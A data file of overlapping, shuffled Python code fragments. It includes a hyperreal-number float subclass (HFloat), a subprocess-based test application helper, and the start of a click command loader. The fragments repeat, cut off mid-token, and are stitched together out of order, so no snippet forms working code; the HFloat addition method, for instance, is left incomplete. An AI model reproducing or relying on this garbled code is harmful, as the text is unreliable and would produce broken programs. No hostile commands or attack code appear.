"extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = {", "HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if", "'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega',", "# print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0) # print(dir(f))", "HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2)", "newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self,", "'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon'", "other): if not self.unit and not other.unit: return def __str__(self): return super().__str__() +", "'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega'", "newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and", "immutable, so overwrite new as well self.unit = unit return float.__new__(self, value) def", "numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\"", "unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit", "'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' :", "value, unit = 'one'): # Float is immutable, so overwrite new as well", "return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one':", "value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other)", "''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f", "+ {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1,", ", 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' ,", "'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, }", ": 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'):", ": 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'},", ", 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float", "__add__(self, other): if not self.unit and not other.unit: return def __str__(self): return super().__str__()", "ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def", "not self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega' :", "__new__(self, value, unit = 'one'): # Float is immutable, so overwrite new as", "'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega'", "type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other)", "= { 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' :", "= super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other)", "unit = 'one'): # Float is immutable, so overwrite new as well self.unit", "super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def", "self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__()", "} def __new__(self, value, unit = 'one'): # Float is immutable, so overwrite", ": 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value,", "super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return def __str__(self):" ]
[ "env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def", "tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None", "self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b'' def start(self,", "['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process =", "import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args", "None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process =", "= subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr =", "and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile)", "os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize,", "last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size:", "start(self, name, args): self.name = name self.args = args or [] fd, self.tmpfile", "[sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd +=", "times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp:", "as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size", "- start sleepfor = interval if timeout is not None: # pragma: no", "os import subprocess import sys import tempfile import threading import time here =", "args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response", "self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize =", "self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable,", "+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env =", "= args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile)", "daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None", "True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile =", "None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, )", "tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self):", "import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name =", "times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0,", "(path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path) return size", "duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,))", "self.response = None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name", "interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times)", "last_size: duration = time.time() - start sleepfor = interval if timeout is not", "b'' def start(self, name, args): self.name = name self.args = args or []", "readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1):", "def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd +=", "env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,", "time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin", "self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy()", "self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is", "= wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None):", "= time.time() - start sleepfor = interval if timeout is not None: #", "self.process is not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate()", "no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change to", "subprocess import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class", "None args = None stdin = None daemon = True def __init__(self): super(TestApp,", "= b'', b'' def start(self, name, args): self.name = name self.args = args", "= [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd", "None: # pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting", "self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname,", ") try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return", "self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname,", "touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as", "self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is None def", "= None args = None stdin = None daemon = True def __init__(self):", "super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None self.tmpsize =", "= os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin = None", "= name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile)", "stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait()", "self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd", "is not None: # pragma: no cover if duration >= timeout: raise RuntimeError(", "None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile:", "self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout,", "change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size", "os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True,", "= readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name]", "% (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path) return", "for change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor)", "file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path)", "import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None", "args = None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__()", "import os import subprocess import sys import tempfile import threading import time here", "time.time() size = os.path.getsize(path) while size == last_size: duration = time.time() - start", "timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size: duration", "sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name", "here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin =", "args): self.name = name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp()", "def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response", "= 0 self.response = None self.stdout, self.stderr = b'', b'' def start(self, name,", "'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time()", "self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start()", "stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self,", "try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process", "= self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is None", "last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'):", "self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize", "is not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join()", "'-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args", "def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size", "os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path,", "is_alive(self): return self.process is not None and self.exitcode is None def stop(self): if", "RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout -", "= None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b''", "or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response =", "stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode", "= True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile", "b'', b'' def start(self, name, args): self.name = name self.args = args or", "= None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval,", "wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response =", "= readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with", "= interval if timeout is not None: # pragma: no cover if duration", "if duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' %", "timeout is not None: # pragma: no cover if duration >= timeout: raise", "return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path)", "fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while", "fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size =", "import subprocess import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__))", "size = os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor", "waiting for change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor)", "self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' +", "None self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr =", "name, args): self.name = name self.args = args or [] fd, self.tmpfile =", "+= self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE,", "cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1'", "+= ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process", "return self.process is not None and self.exitcode is None def stop(self): if self.is_alive():", "self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,", "stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None", "timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor =", "self.name = name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd)", "self).__init__() self.exitcode = None self.process = None self.tmpfile = None self.tmpsize = 0", "def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb')", "duration = time.time() - start sleepfor = interval if timeout is not None:", "= os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env,", "= time.time() size = os.path.getsize(path) while size == last_size: duration = time.time() -", "import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread):", "fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp,", "self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not", "readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if", "= None self.process = None self.tmpfile = None self.tmpsize = 0 self.response =", "interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size: duration =", "touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd =", "wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with", "size == last_size: duration = time.time() - start sleepfor = interval if timeout", "__init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None self.tmpsize", "not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if", "os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin = None daemon", "None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode =", "class TestApp(threading.Thread): name = None args = None stdin = None daemon =", "= os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m',", ") self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def", "self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and", "name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize", "= os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor =", "TestApp(threading.Thread): name = None args = None stdin = None daemon = True", "timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname,", "os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor = interval", "self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize =", "'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout - duration,", "universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self):", "0 self.response = None self.stdout, self.stderr = b'', b'' def start(self, name, args):", "cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally:", "'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def", "start sleepfor = interval if timeout is not None: # pragma: no cover", "subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin)", "super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile:", "self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] =", "with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return", "self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr", "= '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try:", "sleepfor = interval if timeout is not None: # pragma: no cover if", "self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1):", "is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile =", "cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s'", "interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def", "cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile]", "= None self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr", "def start(self, name, args): self.name = name self.args = args or [] fd,", "readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path,", "stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode =", "def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None", "open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start =", "self.exitcode = None self.process = None self.tmpfile = None self.tmpsize = 0 self.response", "def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5,", "finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and self.exitcode", "'1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout,", "raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout", "= None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode", "None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name = name", "os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd", "env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, )", "self.process = None self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout,", "wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size ==", "start = time.time() size = os.path.getsize(path) while size == last_size: duration = time.time()", "[] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile)", "self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'',", "if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED']", "timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile)", "None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b'' def", "None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None", "os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.'", "self.stderr = b'', b'' def start(self, name, args): self.name = name self.args =", "threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args =", "self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path):", ">= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor", "if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5,", "run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file',", "self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is", "while size == last_size: duration = time.time() - start sleepfor = interval if", "pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change", "= self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None", "= None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name =", "if timeout is not None: # pragma: no cover if duration >= timeout:", "None self.process = None self.tmpfile = None self.tmpsize = 0 self.response = None", "cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd,", "# pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for", "self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen(", "self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile,", "'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env", "= None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process", "def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def", "time.time() - start sleepfor = interval if timeout is not None: # pragma:", "== last_size: duration = time.time() - start sleepfor = interval if timeout is", "= tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def", "if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change(", "self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile", "name = None args = None stdin = None daemon = True def", "def is_alive(self): return self.process is not None and self.exitcode is None def stop(self):", "open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines()", "with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start", "interval if timeout is not None: # pragma: no cover if duration >=", "self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name = name self.args", "not None: # pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout", "to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size =" ]
[ "for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'):", "class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose", "class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the", "ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list = []", "\"\"\"Logs a message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg,", "def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to", "ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] ==", "\"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported", "2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace')", "get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0]", "\"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def", "2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod =", "self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import:", "command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically", "enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log", "import importlib import logging import os import sys import click class Context(object): \"\"\"Shared", "log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules", "use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder):", "logging import os import sys import click class Context(object): \"\"\"Shared context object for", "except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return", "import click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def", "classes.\"\"\" import importlib import logging import os import sys import click class Context(object):", "if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name", "os import sys import click class Context(object): \"\"\"Shared context object for passing information", "if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log =", "the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\"", "[] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in", "return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\"", "import logging import os import sys import click class Context(object): \"\"\"Shared context object", "\"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through", "if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name)", "the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join(", "= False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args:", "command_name = filename[0:-3] self.log.debug('Adding command to list: 